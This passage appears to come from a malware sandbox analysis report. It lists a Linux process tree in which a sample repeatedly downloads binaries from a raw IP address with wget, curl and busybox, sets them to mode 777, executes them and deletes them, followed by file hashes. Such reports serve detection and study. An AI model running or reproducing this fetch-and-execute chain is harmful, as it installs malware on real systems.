- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:963
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:966
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:967
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:969
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:972
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:973
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:975
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:978
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:979
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:981
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:984
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:985
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:987
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:990
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:991
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:993
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:996
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:997
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:999
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:1002
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97